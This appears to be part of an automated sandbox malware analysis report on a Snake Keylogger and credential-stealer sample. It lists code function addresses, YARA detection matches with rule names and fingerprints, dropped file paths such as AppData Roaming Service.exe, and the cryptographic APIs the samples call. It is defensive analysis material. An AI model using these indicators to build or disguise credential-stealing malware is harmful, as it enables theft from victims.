Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B86FFB 10_2_05B86FFB
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B887F0 10_2_05B887F0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B83FE8 10_2_05B83FE8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B81FE8 10_2_05B81FE8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B887E0 10_2_05B887E0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B85FD8 10_2_05B85FD8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B89FD8 10_2_05B89FD8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B83FD8 10_2_05B83FD8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B89FC8 10_2_05B89FC8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B8B7C0 10_2_05B8B7C0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B85FC7 10_2_05B85FC7
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B81710 10_2_05B81710
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B8E77F 10_2_05B8E77F
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B856B8 10_2_05B856B8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B836B7 10_2_05B836B7
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B856A8 10_2_05B856A8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B816FF 10_2_05B816FF
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B836C8 10_2_05B836C8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B8AE30 10_2_05B8AE30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B89637 10_2_05B89637
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B8C618 10_2_05B8C618
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B8AE1F 10_2_05B8AE1F
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B8C608 10_2_05B8C608
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B8DE00 10_2_05B8DE00
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B86668 10_2_05B86668
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B87E60 10_2_05B87E60
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B87E50 10_2_05B87E50
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B89648 10_2_05B89648
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B87998 10_2_05B87998
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B87988 10_2_05B87988
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B89180 10_2_05B89180
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B8D938 10_2_05B8D938
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B8F120 10_2_05B8F120
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B8D927 10_2_05B8D927
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B82918 10_2_05B82918
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B8F111 10_2_05B8F111
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B84908 10_2_05B84908
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B82907 10_2_05B82907
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B89171 10_2_05B89171
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B8A968 10_2_05B8A968
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B80960 10_2_05B80960
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B8A958 10_2_05B8A958
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B8C150 10_2_05B8C150
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B80950 10_2_05B80950
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B8C143 10_2_05B8C143
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B848F7 10_2_05B848F7
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B87008 10_2_05B87008
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B80006 10_2_05B80006
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B80040 10_2_05B80040
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B81BA0 10_2_05B81BA0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B81B91 10_2_05B81B91
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B85B39 10_2_05B85B39
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B86B30 10_2_05B86B30
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B88328 10_2_05B88328
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B88319 10_2_05B88319
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B89B10 10_2_05B89B10
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B83B58 10_2_05B83B58
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B85B48 10_2_05B85B48
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B83B4B 10_2_05B83B4B
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B86B40 10_2_05B86B40
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B8E2B8 10_2_05B8E2B8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B8FAB0 10_2_05B8FAB0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B8FAA0 10_2_05B8FAA0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B81280 10_2_05B81280
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B8B2F8 10_2_05B8B2F8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B89AFF 10_2_05B89AFF
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B8B2E8 10_2_05B8B2E8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B8CAE0 10_2_05B8CAE0
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B8CAD1 10_2_05B8CAD1
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B8E2C8 10_2_05B8E2C8
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B83238 10_2_05B83238
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B85228 10_2_05B85228
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B8322B 10_2_05B8322B
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B85219 10_2_05B85219
Source: C:\Users\user\AppData\Local\Temp\PbsonX.exe Code function: 10_2_05B81270 10_2_05B81270
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 13_2_030943D0 13_2_030943D0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 13_2_03095212 13_2_03095212
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 13_2_0309727B 13_2_0309727B
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 13_2_030961C1 13_2_030961C1
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 13_2_03090D32 13_2_03090D32
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 14_2_0092A088 14_2_0092A088
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 14_2_0092D100 14_2_0092D100
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 14_2_0092C2E0 14_2_0092C2E0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 14_2_00925362 14_2_00925362
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 14_2_0092D599 14_2_0092D599
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 14_2_0092C5B0 14_2_0092C5B0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 14_2_0092C87F 14_2_0092C87F
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 14_2_009269A0 14_2_009269A0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 14_2_0092CB52 14_2_0092CB52
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 14_2_0092EC18 14_2_0092EC18
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 14_2_0092FC4E 14_2_0092FC4E
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 14_2_0092CE22 14_2_0092CE22
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 14_2_00926FC8 14_2_00926FC8
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 14_2_0092F7F1 14_2_0092F7F1
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 14_2_009229E0 14_2_009229E0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 14_2_0092EC0A 14_2_0092EC0A
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 14_2_00923E09 14_2_00923E09
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_0224C2E0 15_2_0224C2E0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_02245362 15_2_02245362
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_0224D100 15_2_0224D100
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_0224C5B0 15_2_0224C5B0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_0224D599 15_2_0224D599
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_0224CB51 15_2_0224CB51
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_0224C87F 15_2_0224C87F
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_022469B0 15_2_022469B0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_0224CE21 15_2_0224CE21
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_0224EC18 15_2_0224EC18
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_0224FC58 15_2_0224FC58
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_02249DE0 15_2_02249DE0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_0224D2C8 15_2_0224D2C8
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_02243AB1 15_2_02243AB1
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_0224F800 15_2_0224F800
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_022429EC 15_2_022429EC
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_02243E18 15_2_02243E18
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_0224EC0A 15_2_0224EC0A
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E89590 15_2_04E89590
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E89E80 15_2_04E89E80
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E85290 15_2_04E85290
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E8E4C0 15_2_04E8E4C0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E8E4B1 15_2_04E8E4B1
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E8E068 15_2_04E8E068
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E80040 15_2_04E80040
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E8E059 15_2_04E8E059
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E8003F 15_2_04E8003F
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E8DC0F 15_2_04E8DC0F
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E8DC10 15_2_04E8DC10
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E88DF9 15_2_04E88DF9
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E8F1C8 15_2_04E8F1C8
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E8ED60 15_2_04E8ED60
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E82970 15_2_04E82970
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E8ED70 15_2_04E8ED70
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E8E908 15_2_04E8E908
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E8E918 15_2_04E8E918
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E8CEF7 15_2_04E8CEF7
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E82288 15_2_04E82288
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E85288 15_2_04E85288
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E8FA69 15_2_04E8FA69
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E8FA78 15_2_04E8FA78
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E82278 15_2_04E82278
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E8F620 15_2_04E8F620
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E88E08 15_2_04E88E08
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E8F610 15_2_04E8F610
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E81BA8 15_2_04E81BA8
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E8D7A8 15_2_04E8D7A8
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E8D7B8 15_2_04E8D7B8
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E897B0 15_2_04E897B0
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 15_2_04E81B97 15_2_04E81B97
Yara signature match
Source: 2.2.PbsonX.exe.376d980.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.PbsonX.exe.376d980.4.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.PbsonX.exe.376d980.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.PbsonX.exe.382d410.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.PbsonX.exe.371d970.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.PbsonX.exe.382d410.7.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.PbsonX.exe.371d970.6.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.PbsonX.exe.371d970.6.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.PbsonX.exe.382d410.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.PbsonX.exe.37e8fe0.8.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.PbsonX.exe.37e8fe0.8.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.PbsonX.exe.37e8fe0.8.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.PbsonX.exe.37f61d0.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.PbsonX.exe.37f61d0.5.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.PbsonX.exe.37f61d0.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.PbsonX.exe.37f61d0.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.PbsonX.exe.37f61d0.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.PbsonX.exe.37f61d0.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.PbsonX.exe.37b1db0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.PbsonX.exe.37b1db0.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.PbsonX.exe.37b1db0.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.PbsonX.exe.37b1db0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.PbsonX.exe.376d980.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.PbsonX.exe.37b1db0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.PbsonX.exe.376d980.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 2.2.PbsonX.exe.37b1db0.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.PbsonX.exe.382d410.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.PbsonX.exe.382d410.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.PbsonX.exe.37e8fe0.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.PbsonX.exe.37e8fe0.8.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.PbsonX.exe.371d970.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.PbsonX.exe.371d970.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.1800079314.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.1900190311.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: PbsonX.exe.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Service.exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PbsonX.exe.1.dr, Program.cs Cryptographic APIs: 'CreateDecryptor'
Source: Service.exe.2.dr, Program.cs Cryptographic APIs: 'CreateDecryptor'
Source: 2.2.PbsonX.exe.37b1db0.3.raw.unpack, -m-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.PbsonX.exe.37b1db0.3.raw.unpack, -m-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.PbsonX.exe.37b1db0.3.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.PbsonX.exe.37f61d0.5.raw.unpack, -m-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.PbsonX.exe.37f61d0.5.raw.unpack, -m-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 2.2.PbsonX.exe.37f61d0.5.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
